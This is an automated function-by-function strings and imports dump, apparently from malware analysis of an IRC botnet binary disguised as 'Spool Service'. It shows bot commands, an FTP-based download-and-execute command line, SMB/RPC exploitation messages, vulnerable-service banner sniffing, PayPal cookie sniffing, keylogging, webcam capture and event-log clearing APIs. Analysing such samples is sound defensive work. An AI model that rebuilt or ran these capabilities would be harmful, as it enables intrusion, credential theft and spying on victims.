	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"

sub_41AF50(4107):
	"www.schlund.net"
	"www.utwente.nl"
	"verio.fr"
	"www.1und1.de"
	"www.switch.ch"
	"www.belwue.de"
	"de.yahoo.com"
	"www.google.it"
	"www.xo.net"
	"www.stanford.edu"
	"www.verio.com"
	"www.nocster.com"
	"www.rit.edu"
	"www.cogentco.com"
	"www.burst.net"
	"nitro.ucsc.edu"
	"www.level3.com"
	"www.above.net"
	"www.easynews.com"
	"www.google.com"
	"www.lib.nthu.edu.tw"
	"www.st.lib.keio.ac.jp"
	"www.d1asia.com"
	"www.nifty.com"
	"yahoo.co.jp"
	"www.google.co.jp"

sub_411428(4448):
	KERNEL32.CreatePipe
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CloseHandle

sub_4115FA(4559):
	KERNEL32.ReadFile
	NTDLL.RtlGetLastWin32Error

sub_401A09(4a4e):
	KERNEL32.Sleep

	"PASS	%s\r\n"

sub_40B6EF(4c22):
	" Scan Time: %s."

sub_42183E(502f):
	"e+000"

sub_41B196(5572):
	KERNEL32.GetVersionExA

sub_41E32D(55e5):
	KERNEL32.HeapCreate
	KERNEL32.HeapDestroy

sub_417DCC(593b):
	" "
	"PING"
	"433"

sub_41E3D2(597c):
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap

sub_41B961(5c3f):
	NTDLL.RtlFreeHeap

sub_41C475(5e4f):
	NTDLL.RtlGetLastWin32Error

sub_40D12A(5f99):
	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...

sub_42261C(6091):
	KERNEL32.SetFilePointer
	NTDLL.RtlGetLastWin32Error

sub_424B96(60b5):
	NTDLL.RtlAllocateHeap

sub_4254EE(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"

sub_40E7D2(633c):
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	KERNEL32.Sleep

	"\\\\%s\\ipc$"
	"[-] Failed to	connect	to host	!\n"
	"\\\\%s\\pipe\\browser"
	"[+] Binding to RPC interface ... \n"

sub_419083(6353):
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"

sub_41EAB7(64eb):
	KERNEL32.VirtualAlloc

sub_411521(65bf):
	KERNEL32.GetCurrentProcess
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error

	"cmd /q"

sub_423CBE(66df):
	KERNEL32.WideCharToMultiByte

sub_422478(6954):
	NTDLL.RtlSizeHeap

sub_41513F(6cb9):
	WS2_32.connect
	WS2_32.ioctlsocket
	WS2_32.__WSAFDIsSet
	WS2_32.getsockopt

sub_40EB90(6e5c):
	WS2_32.socket
	WS2_32.connect
	WS2_32.send
	WS2_32.closesocket

sub_40CD4C(6e81):
	WS2_32.select
	WS2_32.__WSAFDIsSet

sub_415DEA(6f62):
	"Window"

sub_41011E(7137):
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	KERNEL32.Sleep

	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\nIndex of %s</TIT"...
	"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
	"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
	".."
	"."
	"PM"
	"AM"
	"%2.2d/%2.2d/%4d  %2.2d:%2.2d %s"
	"<%s>"
	"PRIVMSG %s :%-31s  %-21s\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s/"
	"\"><CODE>%.29s>/</CODE></A>"
	"\"><CODE>%s/</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"<%s>"
	"%-31s  %-21s\r\n"
	"PRIVMSG %s :%-31s  %-21s (%s bytes)\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"\"><CODE>%.30s></CODE></A>"
	"\"><CODE>%s</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"%-31s  %-21s (%i bytes)\r\n"
	"PRIVMSG %s :Found %s Files and %s Direc"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_418E3D"><td><pre><a name="sub_418E3D"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418E3D"><font size=+2>sub_418E3D</a>(73e2)</font>:<font color=darkgreen>
	KERNEL32.GetVersionExA
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcessHeap</font>
<font color=brown>
	"netapi32.dll"
	"NetMessageBufferSend"
</font></pre></td></tr><tr id="sub_41A2A9"><td><pre><a name="sub_41A2A9"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41A2A9"><font size=+2>sub_41A2A9</a>(7918)</font>:<font color=darkgreen>
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_4180E3"><td><pre><a name="sub_4180E3"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4180E3"><font size=+2>sub_4180E3</a>(7aa9)</font>:<font color=brown>
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
</font></pre></td></tr><tr id="sub_41B2E4"><td><pre><a name="sub_41B2E4"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41B2E4"><font size=+2>sub_41B2E4</a>(7bea)</font>:<font color=darkgreen>
	KERNEL32.GetVersionExA</font>
<font color=brown>
	"95"
	"NT"
	"98"
	"ME"
	"2K"
	"XP"
	"2003"
	"???"
	"%s (%s)"
	"couldn't resolve host"
</font></pre></td></tr><tr id="sub_4264BC"><td><pre><a name="sub_4264BC"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4264BC"><font size=+2>sub_4264BC</a>(822d)</font>:<font color=brown>
	"invalid string position"
</font></pre></td></tr><tr id="sub_426290"><td><pre><a name="sub_426290"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_426290"><font size=+2>sub_426290</a>(822d)</font>:<font color=brown>
	"string too long"
</font></pre></td></tr><tr id="sub_41E142"><td><pre><a name="sub_41E142"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41E142"><font size=+2>sub_41E142</a>(84ec)</font>:<font color=darkgreen>
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_42280E"><td><pre><a name="sub_42280E"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_42280E"><font size=+2>sub_42280E</a>(8647)</font>:<font color=darkgreen>
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_41AD75"><td><pre><a name="sub_41AD75"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41AD75"><font size=+2>sub_41AD75</a>(86cb)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown>
	"POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
	"\r\n"
</font></pre></td></tr><tr id="sub_4109AC"><td><pre><a name="sub_4109AC"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4109AC"><font size=+2>sub_4109AC</a>(86fe)</font>:<font color=darkgreen>
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_40B29C"><td><pre><a name="sub_40B29C"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40B29C"><font size=+2>sub_40B29C</a>(8732)</font>:<font color=brown>
	"%s %s	stopped. (%d thread(s) stopped.)"
	"%s No	%s thread found."
</font></pre></td></tr><tr id="sub_41979A"><td><pre><a name="sub_41979A"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41979A"><font size=+2>sub_41979A</a>(893c)</font>:<font color=brown>
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"
</font></pre></td></tr><tr id="sub_41D214"><td><pre><a name="sub_41D214"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41D214"><font size=+2>sub_41D214</a>(8af0)</font>:<font color=darkgreen>
	NTDLL.RtlUnwind</font>
<font color=brown></font></pre></td></tr><tr id="sub_4193FD"><td><pre><a name="sub_4193FD"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4193FD"><font size=+2>sub_4193FD</a>(8cdb)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr><tr id="sub_417EC3"><td><pre><a name="sub_417EC3"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417EC3"><font size=+2>sub_417EC3</a>(8dd5)</font>:<font color=brown>
	"NICK %s\nUSER	%s \"hotmail.com\" \"127.0.0."...
</font></pre></td></tr><tr id="sub_418982"><td><pre><a name="sub_418982"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418982"><font size=+2>sub_418982</a>(8e50)</font>:<font color=darkgreen>
	KERNEL32.GlobalLock
	KERNEL32.GlobalUnlock</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C665"><td><pre><a name="sub_40C665"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40C665"><font size=+2>sub_40C665</a>(9078)</font>:<font color=darkgreen>
	KERNEL32.CreateThread
	KERNEL32.Sleep
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_41DA8E"><td><pre><a name="sub_41DA8E"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41DA8E"><font size=+2>sub_41DA8E</a>(91cb)</font>:<font color=darkgreen>
	KERNEL32.GetFileAttributesA
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_41DF04"><td><pre><a name="sub_41DF04"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41DF04"><font size=+2>sub_41DF04</a>(95ea)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_41AD5B"><td><pre><a name="sub_41AD5B"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41AD5B"><font size=+2>sub_41AD5B</a>(963b)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown></font></pre></td></tr><tr id="sub_40F77A"><td><pre><a name="sub_40F77A"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40F77A"><font size=+2>sub_40F77A</a>(9713)</font>:<font color=darkgreen>
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.connect
	WS2_32.closesocket
	WS2_32.WSACleanup</font>
<font color=brown></font></pre></td></tr><tr id="sub_423D26"><td><pre><a name="sub_423D26"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_423D26"><font size=+2>sub_423D26</a>(9a80)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_419CE8"><td><pre><a name="sub_419CE8"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419CE8"><font size=+2>sub_419CE8</a>(9bb4)</font>:<font color=brown>
	"Invalid parameter."
	"Server name not found."
	"This network request is not supported."
	"Not enough memory."
	"The name is invalid."
	"Duplicate share name."
	"Invalid for redirected resource."
	"Device or directory does not exist."
	"Level	parameter is invalid."
	"A general failure occurred in	the netwo"...
	"The operation	is allowed only	on the pr"...
	"The user account already exists."
	"The group already exists."
	"The password is shorter than required	("...
	"An unknown error occurred."
	"The computer name is invalid."
	"Share	not found."
	"The user name	could not be found."
	"Network connection not found."
</font></pre></td></tr><tr id="sub_418AE3"><td><pre><a name="sub_418AE3"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418AE3"><font size=+2>sub_418AE3</a>(9dbe)</font>:<font color=brown>
	"SeShutdownPrivilege"
</font></pre></td></tr><tr id="sub_419F45"><td><pre><a name="sub_419F45"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419F45"><font size=+2>sub_419F45</a>(9f88)</font>:<font color=darkgreen>
	KERNEL32.lstrcmpiA
	KERNEL32.OpenProcess
	KERNEL32.CloseHandle</font>
<font color=brown>
	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"
</font></pre></td></tr><tr id="sub_40CEEA"><td><pre><a name="sub_40CEEA"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40CEEA"><font size=+2>sub_40CEEA</a>(a2f7)</font>:<font color=darkgreen>
	WS2_32.send</font>
<font color=brown></font></pre></td></tr><tr id="sub_41D721"><td><pre><a name="sub_41D721"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41D721"><font size=+2>sub_41D721</a>(a580)</font>:<font color=darkgreen>
	KERNEL32.GetLocalTime</font>
<font color=brown></font></pre></td></tr><tr id="sub_419B68"><td><pre><a name="sub_419B68"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419B68"><font size=+2>sub_419B68</a>(a909)</font>:<font color=brown>
	"Username accounts for	local system:"
	"  %S"
	"Total	users found: %d."
</font></pre></td></tr><tr id="sub_418FE1"><td><pre><a name="sub_418FE1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418FE1"><font size=+2>sub_418FE1</a>(a9bc)</font>:<font color=darkgreen>
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_419EDA"><td><pre><a name="sub_419EDA"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_419EDA"><font size=+2>sub_419EDA</a>(aacd)</font>:<font color=darkgreen>
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_40A729"><td><pre><a name="sub_40A729"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40A729"><font size=+2>sub_40A729</a>(ac3c)</font>:<font color=brown>
	"Kernel32.dll failed. <%d>"
	"User32.dll failed. <%d>"
	"Advapi32.dll failed. <%d>"
	"Gdi32.dll failed. <%d>"
	"Ws2_32.dll failed. <%d>"
	"Wininet.dll failed. <%d>"
	"Icmp.dll failed. <%d>"
	"Netapi32.dll failed. <%d>"
	"Dnsapi.dll failed. <%d>"
	"Iphlpapi.dll failed. <%d>"
	"Mpr32.dll failed. <%d>"
	"Shell32.dll failed. <%d>"
	"Odbc32.dll failed. <%d>"
	"Avicap32.dll failed. <%d>"
</font></pre></td></tr><tr id="sub_42676B"><td><pre><a name="sub_42676B"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_42676B"><font size=+2>sub_42676B</a>(aeff)</font>:<font color=darkgreen>
	KERNEL32.RaiseException</font>
<font color=brown></font></pre></td></tr><tr id="sub_41E11E"><td><pre><a name="sub_41E11E"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41E11E"><font size=+2>sub_41E11E</a>(af5c)</font>:<font color=darkgreen>
	KERNEL32.ExitProcess</font>
<font color=brown></font></pre></td></tr><tr id="sub_4194CF"><td><pre><a name="sub_4194CF"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4194CF"><font size=+2>sub_4194CF</a>(afa1)</font>:<font color=darkgreen>
	KERNEL32.MultiByteToWideChar</font>
<font color=brown></font></pre></td></tr><tr id="sub_416FAA"><td><pre><a name="sub_416FAA"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_416FAA"><font size=+2>sub_416FAA</a>(b2db)</font>:<font color=brown>
	"Cdrom"
	"Network"
	"Disk"
	"Invalid"
	"Unknown"
</font></pre></td></tr><tr id="sub_421717"><td><pre><a name="sub_421717"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_421717"><font size=+2>sub_421717</a>(b4bf)</font>:<font color=brown>
	"KERNEL32"
	"IsProcessorFeaturePresent"
</font></pre></td></tr><tr id="sub_409A6D"><td><pre><a name="sub_409A6D"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_409A6D"><font size=+2>sub_409A6D</a>(b83b)</font>:<font color=darkgreen>
	KERNEL32.GetModuleHandleA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.LoadLibraryA</font>
<font color=brown>
	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"ClearEventLogA"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"NetWkstaGetInfo"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"
</font></pre></td></tr><tr id="sub_412B76"><td><pre><a name="sub_412B76"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_412B76"><font size=+2>sub_412B76</a>(b9cf)</font>:<font color=brown>
	"HTTP sniff"
	"#mss2"
	"paypal"
	"PAYPAL"
	"PAYPAL.COM"
	"paypal.com"
	"Set-Cookie:"
</font></pre></td></tr><tr id="sub_4230EC"><td><pre><a name="sub_4230EC"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4230EC"><font size=+2>sub_4230EC</a>(b9f1)</font>:<font color=darkgreen>
	KERNEL32.GetEnvironmentStringsW
	KERNEL32.GetEnvironmentStringsA
	KERNEL32.WideCharToMultiByte
	KERNEL32.FreeEnvironmentStringsW</font>
<font color=brown></font></pre></td></tr><tr id="sub_4018A1"><td><pre><a name="sub_4018A1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4018A1"><font size=+2>sub_4018A1</a>(bc9b)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown></font></pre></td></tr><tr id="sub_418D50"><td><pre><a name="sub_418D50"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418D50"><font size=+2>sub_418D50</a>(c073)</font>:<font color=brown>
	"spools.exe"
	"cmd /k echo open %s %d >> ii &echo user"...
</font></pre></td></tr><tr id="sub_40AF44"><td><pre><a name="sub_40AF44"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40AF44"><font size=+2>sub_40AF44</a>(c0f8)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown>
	"[%d]"
</font></pre></td></tr><tr id="sub_40B562"><td><pre><a name="sub_40B562"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40B562"><font size=+2>sub_40B562</a>(c3fd)</font>:<font color=brown>
	" Total: %d in %s."
</font></pre></td></tr><tr id="sub_4189BD"><td><pre><a name="sub_4189BD"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4189BD"><font size=+2>sub_4189BD</a>(c558)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle</font>
<font color=brown>
	"mIRC"
	"explorer.exe"
</font></pre></td></tr><tr id="sub_41EF81"><td><pre><a name="sub_41EF81"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41EF81"><font size=+2>sub_41EF81</a>(c6bf)</font>:<font color=darkgreen>
	KERNEL32.ReadFile
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_40AC10"><td><pre><a name="sub_40AC10"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40AC10"><font size=+2>sub_40AC10</a>(cb72)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown>
	"%s"
</font></pre></td></tr><tr id="sub_41CF70"><td><pre><a name="sub_41CF70"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41CF70"><font size=+2>sub_41CF70</a>(cba9)</font>:<font color=darkgreen>
	NTDLL.RtlUnwind</font>
<font color=brown></font></pre></td></tr><tr id="sub_41EA06"><td><pre><a name="sub_41EA06"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41EA06"><font size=+2>sub_41EA06</a>(cbe8)</font>:<font color=darkgreen>
	NTDLL.RtlReAllocateHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.VirtualAlloc
	NTDLL.RtlFreeHeap</font>
<font color=brown></font></pre></td></tr><tr id="start"><td><pre><a name="start"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#start"><font size=+2>start</a>(cdf3)</font>:<font color=brown>
	"Spool Service"
</font></pre></td></tr><tr id="sub_412BFD"><td><pre><a name="sub_412BFD"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_412BFD"><font size=+2>sub_412BFD</a>(cfb4)</font>:<font color=brown>
	"VULN sniff"
	"#mss2"
	"OpenSSL/0.9.6"
	"Serv-U FTP Server"
	"OpenSSH_2"
</font></pre></td></tr><tr id="sub_4107A0"><td><pre><a name="sub_4107A0"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4107A0"><font size=+2>sub_4107A0</a>(d1bd)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.SetFilePointer
	KERNEL32.ReadFile
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_420F11"><td><pre><a name="sub_420F11"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_420F11"><font size=+2>sub_420F11</a>(d2f6)</font>:<font color=darkgreen>
	KERNEL32.RaiseException</font>
<font color=brown></font></pre></td></tr><tr id="sub_41BA78"><td><pre><a name="sub_41BA78"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41BA78"><font size=+2>sub_41BA78</a>(d50c)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap
	NTDLL.RtlReAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_413CC1"><td><pre><a name="sub_413CC1"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_413CC1"><font size=+2>sub_413CC1</a>(d826)</font>:<font color=darkgreen>
	WS2_32.socket
	WS2_32.ioctlsocket
	WS2_32.connect
	KERNEL32.Sleep
	WS2_32.closesocket</font>
<font color=brown></font></pre></td></tr><tr id="sub_4245B2"><td><pre><a name="sub_4245B2"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4245B2"><font size=+2>sub_4245B2</a>(d8fa)</font>:<font color=darkgreen>
	KERNEL32.SetUnhandledExceptionFilter</font>
<font color=brown></font></pre></td></tr><tr id="sub_417D85"><td><pre><a name="sub_417D85"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417D85"><font size=+2>sub_417D85</a>(d935)</font>:<font color=brown>
	"\n"
</font></pre></td></tr><tr id="sub_417228"><td><pre><a name="sub_417228"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_417228"><font size=+2>sub_417228</a>(dc5b)</font>:<font color=brown>
	"A:\\"
</font></pre></td></tr><tr id="sub_41A702"><td><pre><a name="sub_41A702"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41A702"><font size=+2>sub_41A702</a>(dcb6)</font>:<font color=brown>
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
</font></pre></td></tr><tr id="sub_40AB6A"><td><pre><a name="sub_40AB6A"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40AB6A"><font size=+2>sub_40AB6A</a>(e076)</font>:<font color=brown>
	"%d.%d.%d.%d"
</font></pre></td></tr><tr id="sub_41088B"><td><pre><a name="sub_41088B"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41088B"><font size=+2>sub_41088B</a>(e1a1)</font>:<font color=brown>
	"%s %s	HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
</font></pre></td></tr><tr id="sub_41E369"><td><pre><a name="sub_41E369"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_41E369"><font size=+2>sub_41E369</a>(e71f)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_40C574"><td><pre><a name="sub_40C574"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40C574"><font size=+2>sub_40C574</a>(e730)</font>:<font color=darkgreen>
	KERNEL32.CreateThread
	KERNEL32.Sleep
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_418F1D"><td><pre><a name="sub_418F1D"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_418F1D"><font size=+2>sub_418F1D</a>(ec5e)</font>:<font color=darkgreen>
	KERNEL32.GetTickCount</font>
<font color=brown></font></pre></td></tr><tr id="sub_4157A6"><td><pre><a name="sub_4157A6"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_4157A6"><font size=+2>sub_4157A6</a>(edda)</font>:<font color=darkgreen>
	KERNEL32.GetLocalTime</font>
<font color=brown>
	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
</font></pre></td></tr><tr id="sub_416029"><td><pre><a name="sub_416029"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_416029"><font size=+2>sub_416029</a>(ef39)</font>:<font color=brown>
	"r"
	"="
	"="
</font></pre></td></tr><tr id="sub_40C9E6"><td><pre><a name="sub_40C9E6"></a><a href="51c0a74ab9f7255780edaefda67d31fe_unpacked.asm.html#sub_40C9E6"><font size=+2>sub_40C9E6</a>(f1cc)</font>:<font color=brown>
	"�B�B�B�B"
